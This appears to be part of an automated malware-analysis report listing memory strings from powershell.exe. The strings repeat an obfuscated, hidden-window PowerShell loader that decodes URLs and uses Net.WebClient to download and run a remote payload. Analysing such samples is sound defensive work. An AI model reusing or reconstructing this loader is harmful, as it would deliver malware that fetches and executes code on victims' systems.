os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(K
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CEDD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: rentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshil
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CFCA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: skolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indbandtes ' r$Stg u
Source: powershell.exe, 00000002.00000002.2357862558.0000020B5A9A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\Desktop\C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBa
Source: powershell.exe, 00000005.00000002.2205456986.0000000008430000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(
Source: powershell.exe, 00000002.00000002.2357862558.0000020B5A9A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CEDD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG
Source: powershell.exe, 00000002.00000002.2485251498.0000020B74913000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5C7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CEDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2357862558.0000020B5A9B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361180627.0000020B5C460000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002BDA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002B9E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197526043.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197275382.0000000004690000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: 